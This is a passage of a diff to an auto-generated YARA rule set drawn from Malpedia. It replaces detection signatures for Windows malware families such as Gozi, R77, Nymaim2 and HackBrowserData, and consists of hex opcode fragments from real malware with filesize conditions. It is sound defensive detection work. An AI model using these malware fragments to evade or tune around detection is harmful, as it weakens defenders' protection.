-		logic_hash = "1d2de4db39b1900c0def6a2d43ab52baecc925bfad5faca5ff76425cebd9b30d"
+		logic_hash = "6fec244d34dfdfffb8f190bd531090181ff56cb0a8f461ac3c66e10426835858"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121438,32 +121758,30 @@ rule MALPEDIA_Win_Unidentified_037_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b9ff000000 33c0 8dbc242d040000 889c242c040000 be???????? }
-		$sequence_1 = { 52 e8???????? 55 8d4c2414 }
-		$sequence_2 = { e8???????? 56 8d8c24ac010000 8b542420 2bd6 8d8414ac010000 50 }
-		$sequence_3 = { 83c704 48 75e2 8b442410 5b 33d2 33ff }
-		$sequence_4 = { 8d8424b8040000 52 50 ff15???????? 8d8c24b8040000 51 ff15???????? }
-		$sequence_5 = { 6a00 8d4c2424 681f000f00 51 ffd5 85c0 }
-		$sequence_6 = { 83c002 4f 75f1 8b4604 894e08 66c704480000 8b4d14 }
-		$sequence_7 = { 3bf5 7639 8b542418 55 8d4c2414 8d3c32 57 }
-		$sequence_8 = { 03f3 81ec84020000 b9a1000000 8bfc f3a5 e8???????? 85c0 }
-		$sequence_9 = { 8801 eb09 51 e8???????? 83c404 8b4c240c 895e04 }
+		$sequence_0 = { 68???????? 52 c744242004000000 ff15???????? 83bc242002000000 }
+		$sequence_1 = { 81ec1c020000 a1???????? 33c4 89842418020000 8b842424020000 2d10010000 }
+		$sequence_2 = { 803d????????00 7521 8b542410 52 68???????? e8???????? }
+		$sequence_3 = { 53 ff15???????? 88442413 807c241300 7480 03742424 }
+		$sequence_4 = { e8???????? 83c408 85c0 7405 bd01000000 5f 33c0 }
+		$sequence_5 = { 50 8d8c2420020000 51 e8???????? 83c408 391d???????? 7516 }
+		$sequence_6 = { ff15???????? 50 6a00 6800110000 ff15???????? 8b1424 52 }
+		$sequence_7 = { 56 68???????? e8???????? 83c408 5e 8bc3 5b }
 
 	condition:
-		7 of them and filesize < 167936
+		7 of them and filesize < 330752
 }
-rule MALPEDIA_Win_Nymaim2_Auto : FILE
+rule MALPEDIA_Win_Ruckguv_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b34e9293-8593-5a44-9c75-a60856a38adc"
+		id = "8f499e75-91f2-52c8-a94a-c83686f92c36"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nymaim2_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ruckguv_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "1e69e778cd0db9f8366da07218fbdcf365b60086ad2357e3134734801ed5db37"
+		logic_hash = "6d10b38eb1f1d62aeb4e76b727620952b9c0cf6c443b89f37ac94de3a6d9e6ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121477,32 +121795,32 @@ rule MALPEDIA_Win_Nymaim2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8065fc00 8d4dd8 e8???????? 834dfcff 8d4d08 e8???????? 8b4df4 }
-		$sequence_1 = { 3b01 751e 53 50 8d450c 56 50 }
-		$sequence_2 = { 8bcc 896508 50 ff75e4 eb20 a1???????? }
-		$sequence_3 = { 7e64 8b45b8 8d4dec 8d04b0 50 e8???????? 8d4dec }
-		$sequence_4 = { 57 8bf1 8365fc00 8b7e08 51 8d4508 8bcc }
-		$sequence_5 = { 56 50 c645fc03 ff7508 ff75ec e8???????? 83c410 }
-		$sequence_6 = { 33db 59 53 8d4ddc e8???????? 8d8d30ffffff 895dfc }
-		$sequence_7 = { 03450c c1ea0c 0301 83ea00 }
-		$sequence_8 = { 837dd80c 74e7 3ac3 0f843f030000 837dd802 7509 395dd0 }
-		$sequence_9 = { c645fc02 e8???????? 8b00 8bcf 8945e8 8d45e4 50 }
+		$sequence_0 = { 53 56 fe4513 0fb64d13 8d3401 8a16 0055ff }
+		$sequence_1 = { 85c0 747f 56 03c3 50 e8???????? }
+		$sequence_2 = { 8b4834 3bf1 7504 b001 eb7c 8b80a0000000 }
+		$sequence_3 = { 6a01 e8???????? 83c428 8d8da0feffff 51 }
+		$sequence_4 = { 05f8000000 813f50450000 894508 0f851c010000 8b5f50 68fe6a7a69 }
+		$sequence_5 = { 0fb645fe 03c1 8a18 fe45ff 881e 8810 660fb645ff }
+		$sequence_6 = { 8d859cfdffff 50 68???????? e8???????? 6814f1f808 6a01 897558 }
+		$sequence_7 = { ff74240c ff74240c ffd0 c3 685f70353a 6a01 e8???????? }
+		$sequence_8 = { 8b37 85f6 7503 8b7710 03f3 }
+		$sequence_9 = { 53 33d2 56 57 8855ff 8855fe 889100010000 }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 41024
 }
-rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
+rule MALPEDIA_Win_Woody_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fa71a6d-0c80-54bf-8699-93451280ec8a"
+		id = "a1d402bd-2e1b-5cc3-9efe-bee43a3f6f70"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fuwuqidrama_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woody_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "01914df1a3041b58ec9ceec9faa5307c8556d20ec25933ac048149432128c635"
+		logic_hash = "9fa53ff2aea1026050fd9bf490e4459858b6e425e2d1081bd2beeba1427b1834"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121516,76 +121834,71 @@ rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8eac040000 c744242813000000 e8???????? 8b86a4040000 8dbea0040000 50 c644242c12 }
-		$sequence_1 = { 33ee 8b742418 33ee 8bdf 036908 }
-		$sequence_2 = { 85f6 57 8be9 0f8483000000 8b7c241c 85ff 7461 }
-		$sequence_3 = { 8964241c 50 e8???????? 8b742430 8d4c2424 51 8bce }
-		$sequence_4 = { 8b742410 85f6 765b 8bce 8bb424a4000000 8bc1 8d7c241c }
-		$sequence_5 = { 8944241c 89542418 0f8cadfeffff 55 e8???????? 83c404 5f }
-		$sequence_6 = { e8???????? 8b442418 46 3bf0 0f8c57ffffff 8b85c0000000 6a04 }
-		$sequence_7 = { 746d 8b542410 8b442444 8d4c244c 6a00 51 }
-		$sequence_8 = { 8b8424f8040000 8d8c24d0010000 50 c78424f404000000000000 e8???????? }
-		$sequence_9 = { 899708140000 898704140000 ff15???????? 8b16 8d4704 6a00 50 }
+		$sequence_0 = { 6881010100 50 e8???????? 83c414 8d8c2414010000 68b4000000 50 }
+		$sequence_1 = { f3a5 8bca 8b542420 83e103 8d442414 f3a4 8d4c242c }
+		$sequence_2 = { 23c7 8bce f7d1 23ca 0bc8 8d9c1956b7c7e8 035dc4 }
+		$sequence_3 = { 56 8903 ffd7 5f 5e 894304 5d }
+		$sequence_4 = { 8d7c2428 8d54241c f3ab 8d442414 8d4c2428 50 8b442414 }
+		$sequence_5 = { e8???????? 8b35???????? 8d8530fdffff 6a5c 50 ffd6 83c410 }
+		$sequence_6 = { 50 e8???????? 8d85b4feffff 83c40c 8945c8 8d45b8 50 }
+		$sequence_7 = { 56 85ed 57 0f843a020000 8b9424c40b0000 85d2 }
+		$sequence_8 = { 8b5604 85d2 740b 8bc1 2bc2 c1f803 3bf8 }
+		$sequence_9 = { 83c408 85c0 7505 bf01000000 85f6 7404 85ff }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Cinobi_Auto : FILE
+rule MALPEDIA_Win_Narilam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50908ef8-eb52-5007-8c2a-256211d7237f"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cinobi_auto.yar#L1-L156"
+		id = "da9d4048-8edf-5bad-820f-4e60bf8a1167"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.narilam_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1ae8fc64307c077f4211ff04fa6a49a6ca1181e14e0c37993b50c43b3f285591"
+		logic_hash = "9c97c97f1983ca4888bd0ceffb3db6cc9301c52fb6e7adafbcc7af03cf7073fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 }
-		$sequence_1 = { c9 c3 0fb6d2 0fb6c1 }
-		$sequence_2 = { 8b45c0 ff705f 8b45c0 ff706b ff75dc }
-		$sequence_3 = { ff7067 ff75dc e8???????? 83c40c 8b4dc0 }
-		$sequence_4 = { 8d75e8 8945e4 e8???????? 59 84c0 0f8493000000 8b45ec }
-		$sequence_5 = { 57 ff565f 8986f7000000 8d86a9030000 50 57 ff565f }
-		$sequence_6 = { 59 84c0 751a 57 ff96b3000000 }
-		$sequence_7 = { 668945aa 8b85a8faffff 660fbe4025 668945ac 8b85a8faffff 660fbe4001 }
-		$sequence_8 = { 50 ff93a3000000 8d45cc 50 8bc7 }
-		$sequence_9 = { 6689855afbffff 8b45f8 660fbe403a 6689855cfbffff 8b45f8 }
-		$sequence_10 = { 88842450010000 8a4646 88842451010000 8a460b }
-		$sequence_11 = { 8b45c0 8a4034 8845c9 8b45c0 }
-		$sequence_12 = { 8b45f4 ff9083000000 32c0 eb61 }
-		$sequence_13 = { 8b45f4 ff9083000000 b001 c9 }
-		$sequence_14 = { ffb683000000 57 e8???????? ff765f 898683000000 }
+		$sequence_0 = { e8???????? f645f801 7518 8d55f4 a1???????? e8???????? 8b45f4 }
+		$sequence_1 = { 8d8550ffffff ba02000000 e8???????? 66c785dcfeffffe801 ba???????? 8d854cffffff e8???????? }
+		$sequence_2 = { e8???????? 8b55fc 8bc6 e8???????? 8bf8 e9???????? 8d5308 }
+		$sequence_3 = { eb83 e9???????? 66b86801 ebf5 66b86901 ebef 66b86a01 }
+		$sequence_4 = { e8???????? eb08 8b45fc e8???????? 33c0 5a 59 }
+		$sequence_5 = { e8???????? c3 3a90e2020000 740b 8890e2020000 e8???????? c3 }
+		$sequence_6 = { e8???????? 8bc8 8bd3 8b831c020000 ff9318020000 33c0 8a45ff }
+		$sequence_7 = { a5 a5 a5 8d4584 8d4dd4 ba04000000 e8???????? }
+		$sequence_8 = { ff852cffffff 8d5588 8d45fc e8???????? ff8d2cffffff 8d4588 ba02000000 }
+		$sequence_9 = { 8d8580feffff e8???????? ff854cfeffff 8d9580feffff 8d45fc e8???????? ff8d4cfeffff }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 3325952
 }
-rule MALPEDIA_Win_Screencap_Auto : FILE
+rule MALPEDIA_Win_Clambling_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c09ded30-7ed9-5627-bd4b-b5b9719d1b79"
+		id = "e480c0cb-e19c-5e93-97bb-00caac1a9f2e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.screencap_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clambling_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "fe7ef238cffaf8f0702b709313aa3e525535b37ee9076ff1908a7fc171fcfe6f"
+		logic_hash = "f3f0a4943735cbe1e2ffa9646f9d73cc0975851d00f58a2bf60f2536a8d04784"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121599,34 +121912,34 @@ rule MALPEDIA_Win_Screencap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c2444 4183ec28 894804 8b4c2448 488bf8 6689580c }
-		$sequence_1 = { 4c8d0dee6d0100 4c8d0567120100 ba00080000 488bc8 48c744242000000000 e8???????? 85c0 }
-		$sequence_2 = { d1f8 7423 66837c46fe5c 741b 403bc5 7316 }
-		$sequence_3 = { 488bc8 4c8be0 ff15???????? 488b15???????? 33c0 }
-		$sequence_4 = { 488d0da7e70000 488b0cc1 44897c2444 4c8b7c2460 498b0c0f 4c8d4c2448 }
-		$sequence_5 = { 418d4b06 410fb7c3 44895d0c 4c895d04 66f3ab 488d3ddebb0000 }
-		$sequence_6 = { 7406 484a85c0 7fcc 66892c57 }
-		$sequence_7 = { 488d152ccb0000 e9???????? 488d1510cb0000 eb7c 488d15f7ca0000 eb73 488d15deca0000 }
-		$sequence_8 = { 8b7214 3b7204 7204 33c0 }
-		$sequence_9 = { 50 8b442438 4850 e8???????? 50 }
+		$sequence_0 = { b910000000 ff15???????? 66448bd8 41c1eb0b 4180e310 4180cb2f e9???????? }
+		$sequence_1 = { ba04010000 ff15???????? 83f8ff 7508 ff15???????? }
+		$sequence_2 = { b940000000 ff15???????? 448b8c24a0000000 488b8c24b0000000 }
+		$sequence_3 = { 56 57 4154 4155 4883ec68 4533ed }
+		$sequence_4 = { 8bd8 488b8c24a8010000 ff15???????? eb08 ff15???????? }
+		$sequence_5 = { 7448 4c8d442434 488bd7 33c9 ff15???????? }
+		$sequence_6 = { 750b ff15???????? e9???????? 0fbfeb }
+		$sequence_7 = { ffc7 4503e7 3bfd 7ce0 668b5c2430 }
+		$sequence_8 = { 488b8c24a8010000 ff15???????? 8907 eb08 ff15???????? 8bd8 488b8c24a8010000 }
+		$sequence_9 = { 8bf1 894c2438 6683c303 6681e3fcff }
 
 	condition:
-		7 of them and filesize < 1391616
+		7 of them and filesize < 412672
 }
-rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
+rule MALPEDIA_Win_Gozi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3aae9ed-192f-5ff5-b564-ee9df4ce3245"
+		id = "aac9b6f0-8c81-5a6b-8a62-7eb8449e0397"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hackbrowserdata_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gozi_auto.yar#L1-L301"
 		license_url = "N/A"
-		logic_hash = "2b6a9208dc476df90c318e1825117cca44974a3b5522e1f9f1cb79fdbda237c3"
+		logic_hash = "6d080496b0bc709b18cae762326b65ba3fe68298a3c52833320cbdca2a2db665"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121638,32 +121951,54 @@ rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb14 488b8c2458010000 488b5150 e8???????? 498913 48c7415000000000 488b842410010000 }
-		$sequence_1 = { c3 4989f0 4d8b4008 4883c610 48ffc0 4a8d0c01 488d4901 }
-		$sequence_2 = { eb22 488d1568e79f00 488b5c2470 488b442468 488b8c24a8000000 488d354f6ba000 31d2 }
-		$sequence_3 = { 884c2446 e8???????? 48898c24e8000000 4889bc24f0000000 4885c9 7459 0fb64c2447 }
-		$sequence_4 = { eb17 e8???????? 488bb42458010000 498933 4c8b00 4d894308 488930 }
-		$sequence_5 = { e8???????? 488d0551f2d100 bb32000000 e8???????? 90 4889442408 e8???????? }
-		$sequence_6 = { e8???????? 488b9c2480000000 49891b 488b340a 49897308 48891c0a 488d0589e51a00 }
-		$sequence_7 = { f00fc15848 ffcb 85db 7d10 4c89c0 e8???????? 488b842408010000 }
-		$sequence_8 = { c6461506 4889ca 90 83793000 742d 488d0d44bc7d00 48894c2478 }
-		$sequence_9 = { e8???????? 0f1f440000 83f803 750d 8b9424c0000000 85d2 7509 }
+		$sequence_0 = { 3b4dfc 73df 33c0 5e c9 c21000 }
+		$sequence_1 = { 0e 96 3b5375 60 }
+		$sequence_2 = { 48 fb 5c 3c32 7e02 }
+		$sequence_3 = { 894508 eb03 897d08 bf???????? 57 }
+		$sequence_4 = { 0bc0 7408 60 50 e8???????? 61 }
+		$sequence_5 = { 7061 63743200 c808bf35 6963c03caff3da c9 50 0c73 }
+		$sequence_6 = { 8b450c 03f0 8b4e0c 85c9 8975e8 0f8453010000 }
+		$sequence_7 = { 0faff1 c7458804000000 a1???????? 8b0d???????? 6a00 68f80a0000 }
+		$sequence_8 = { 7e02 19c1 a6 3327 72e7 3ebb4a68d947 }
+		$sequence_9 = { e8???????? 8945fc 6805010000 6a40 }
+		$sequence_10 = { 8b45fc 8b08 6a00 50 ff91a4000000 33c9 85c0 }
+		$sequence_11 = { 3a56b9 036890 2b02 9a102a6715fb53 }
+		$sequence_12 = { 0ad0 4a 0fca 8af4 0fbdf1 0fbaf6be }
+		$sequence_13 = { ad b710 2dc7ce5bbb d6 b6c6 e8???????? 6af4 }
+		$sequence_14 = { 33c0 ebf7 56 8b74240c 57 }
+		$sequence_15 = { 7708 8b4df8 e8???????? 837d0c00 766f 8b4df8 }
+		$sequence_16 = { 55 8bec 83c4fc 53 837d0c4a }
+		$sequence_17 = { 50 0c73 0e 96 }
+		$sequence_18 = { e8???????? 8985b0feffff 8d8dbcfeffff 51 56 ffd0 85c0 }
+		$sequence_19 = { ffd0 8345e404 ebe6 c745e0d4814300 817de0d8814300 }
+		$sequence_20 = { 1da2c9dde2 f4 16 ee 7f7b 36110b 33745571 }
+		$sequence_21 = { 8b45d0 833800 755d 6a18 e8???????? }
+		$sequence_22 = { eb15 c745f0ffffffff 6a04 8d45f0 50 }
+		$sequence_23 = { 8b4dfc 8b09 85c9 0f84d7000000 }
+		$sequence_24 = { ff45f0 48 8816 75ee }
+		$sequence_25 = { 0fadce d2ee 84e5 8af4 0fbdf1 }
+		$sequence_26 = { 56 8d45fc 50 6a08 33f6 ff15???????? }
+		$sequence_27 = { b636 0fafd5 80cafa 69f1eef9d83b 8ad0 }
+		$sequence_28 = { 0fbdf1 b67e d2ca f6de }
+		$sequence_29 = { 730d 898c85b0feffff ff85acfeffff 899da0feffff 33c0 8dbda4feffff ab }
+		$sequence_30 = { ff15???????? 8bd8 3bde 895d64 }
+		$sequence_31 = { 53 c705????????00000000 68???????? 6a01 }
 
 	condition:
-		7 of them and filesize < 42451968
+		7 of them and filesize < 568320
 }
-rule MALPEDIA_Win_Unidentified_088_Auto : FILE
+rule MALPEDIA_Win_Doublefantasy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2c85c30-7ba6-55a0-9cd5-72dd624b0463"
+		id = "5fe3121c-5496-55ab-9366-675d7b098073"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_088_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublefantasy_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "43e33104a2b3e4b5653d5103e68195a062333638b6afc520c108067d1cded5c7"
+		logic_hash = "a1a10ee4973cf324c6bb6108700a68b5d1131343a7e5a1c18b7924dc06048831"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121677,32 +122012,38 @@ rule MALPEDIA_Win_Unidentified_088_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8ff 89442404 891c24 e8???????? 8b4510 6bdb0c 031e }
-		$sequence_1 = { c705????????04000000 c705????????208d4200 c705????????5beb4100 c705????????60154200 c605????????01 c705????????08000000 }
-		$sequence_2 = { c705????????20124200 c605????????01 c705????????20000000 c705????????00ac4200 c705????????12ea4100 c705????????02000000 c605????????02 }
-		$sequence_3 = { c605????????01 c705????????9fe14100 c705????????a8074200 c605????????01 c705????????a8e14100 c705????????c0074200 c705????????01000000 }
-		$sequence_4 = { c705????????a0a44200 c705????????00d64100 c705????????a8004200 c705????????00000000 c705????????04000000 c705????????04000000 66c705????????1d03 }
-		$sequence_5 = { 8b55ec 0345e0 1355e4 83c424 5b 5e 5f }
-		$sequence_6 = { 8b4de4 89c2 e8???????? 52 8b0e 89c3 }
-		$sequence_7 = { c605????????01 c705????????04000000 c705????????e08c4200 c705????????93ea4100 c705????????20134200 c605????????01 c705????????08000000 }
-		$sequence_8 = { c705????????c0ac4200 c705????????8cea4100 c705????????08134200 c605????????01 c705????????04000000 c705????????e08c4200 c705????????93ea4100 }
-		$sequence_9 = { 720d 48 891c24 89442404 e8???????? 8b470c 8b55d4 }
+		$sequence_0 = { 8d50fd 891485a4ab2700 40 3bc1 72f1 833d????????fd 7516 }
+		$sequence_1 = { 50 8d45d4 50 ff7508 ff15???????? 83c41c }
+		$sequence_2 = { 57 53 68???????? ff75d8 8b35???????? ffd6 8945e0 }
+		$sequence_3 = { 33d2 8a5001 c1ee06 83e20f c1e202 0bd6 8a92908c2700 }
+		$sequence_4 = { 40 c3 33c9 3b05???????? 0f9cc1 8bc1 c3 }
+		$sequence_5 = { 50 ff15???????? 897e10 897e0c 8b7620 3bf7 }
+		$sequence_6 = { 8b442404 0fb608 c1e902 8a91908c2700 8b4c2408 }
+		$sequence_7 = { 0bd6 8a92908c2700 eb02 b23d 837c241002 }
+		$sequence_8 = { 3c7a 770b 0fb6c0 8a80ad8c2700 eb02 }
+		$sequence_9 = { 68???????? e8???????? 8b4605 c68094a3270000 ff35???????? ff35???????? }
+		$sequence_10 = { ff35???????? e8???????? 83c41c e8???????? 33ff e9???????? }
+		$sequence_11 = { 85c9 7616 8da42400000000 8d50fd 891485a4ab2700 40 }
+		$sequence_12 = { c745e405400080 8365fc00 c745fc01000000 8b7508 8b4620 85c0 7477 }
+		$sequence_13 = { 8a92908c2700 885101 7e1c 0fb67002 33d2 8a5001 }
+		$sequence_14 = { e8???????? 50 6a5c 57 }
+		$sequence_15 = { 837df804 59 7426 6800002000 }
 
 	condition:
-		7 of them and filesize < 919552
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Nitrogen_Auto : FILE
+rule MALPEDIA_Win_R77_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b860399-f17f-5be6-a7fa-0d462134408c"
+		id = "82a35666-90fe-5251-926e-d8ec55b813d1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitrogen_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.r77_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "7fc10887629eb8cbe7591a0bc8e19e89881d6b530c9068ab47e88598472a7314"
+		logic_hash = "a6240af5ccc4c53bc37ef2e7a551ebc739733179f6b77ecd5d71bb872b7b54ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121716,32 +122057,36 @@ rule MALPEDIA_Win_Nitrogen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0b c784246805000000000000 8b05???????? 0faf842468050000 8bc0 0fb74c2444 0fbfc9 }
-		$sequence_1 = { 7416 eb25 0fb6442434 0fbec0 c1e007 4898 4889442468 }
-		$sequence_2 = { b8b37e0000 6689442438 0fb605???????? 480fbec0 4889842490000000 488b05???????? 48898424a8010000 }
-		$sequence_3 = { c644245d01 eb05 c644245d00 0fb644245d 8805???????? 0fb7442430 0fb7c0 }
-		$sequence_4 = { eb0b c78424dc02000000000000 8b8424dc020000 398424e0020000 7e02 eb17 0fbf05???????? }
-		$sequence_5 = { b83f670000 668944243c 0fb6442431 0fbec0 05c222fae3 8bc0 4889842498000000 }
-		$sequence_6 = { c744247404000000 488b842440010000 488905???????? 0fb7442428 98 0fbf4c2434 33c1 }
-		$sequence_7 = { e8???????? 4989c3 b9508cf2a7 e8???????? 4883c428 488b4c2408 488b542410 }
-		$sequence_8 = { c644240b35 488b05???????? 4889842498000000 0fb605???????? 0fb6c0 8944246c 0fb6442408 }
-		$sequence_9 = { e8???????? 898424f8020000 0fbe442441 b904000000 4869c98f020000 488d157f9e3b00 89040a }
+		$sequence_0 = { 740b 8b0f e8???????? 85c0 }
+		$sequence_1 = { 740c 8b4f0c e8???????? 85c0 }
+		$sequence_2 = { 660fc5c400 25f0070000 660f28a050680110 660f28b840640110 660f54f0 660f5cc6 660f59f4 }
+		$sequence_3 = { 488b4b18 e8???????? 85c0 744b 488b5720 488b4b20 e8???????? }
+		$sequence_4 = { 8b0c85f8a00110 8a0413 03ce 8844192e 43 }
+		$sequence_5 = { 4533db 488b05???????? 4885c0 7432 488b5028 418bcb 448b02 }
+		$sequence_6 = { 488bc8 ff15???????? 85c0 740e 395c2440 0f94c3 }
+		$sequence_7 = { ff7650 6a00 ffd0 8bd8 895de8 85db }
+		$sequence_8 = { 837f0800 7414 8b470c ff3498 8b460c ff3498 }
+		$sequence_9 = { 8b45f8 83c030 894508 837d0c00 750b 6a0d e8???????? }
+		$sequence_10 = { 418bc8 418b048b 4139048a 750e 41ffc0 453bc1 72eb }
+		$sequence_11 = { d1e1 8b5508 0fb6040a 83f840 }
+		$sequence_12 = { 7357 498bc8 4c8d1571e80000 83e13f 498bc0 }
+		$sequence_13 = { 488b55c8 4c8d054efd0000 85c0 0f8417010000 }
 
 	condition:
-		7 of them and filesize < 65433600
+		7 of them and filesize < 350208
 }
-rule MALPEDIA_Win_Chainshot_Auto : FILE
+rule MALPEDIA_Win_Bottomloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e1db7f53-0270-5824-82d9-8aed908ee2be"
+		id = "b80f27db-a9fe-5886-83a1-b7800bdc0933"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chainshot_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bottomloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8440e51f4c64f9f335a379594cb3f694f5050a99bd0f6190db9cf62fbca5d726"
+		logic_hash = "e605cbf05da14cecd741717af69ae46ce70b645051ad1189e53cd9ddfd6b5a03"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121755,32 +122100,32 @@ rule MALPEDIA_Win_Chainshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d5e30 8bcb e8???????? }
-		$sequence_1 = { 7408 ffd0 8905???????? b90c000080 894c2420 }
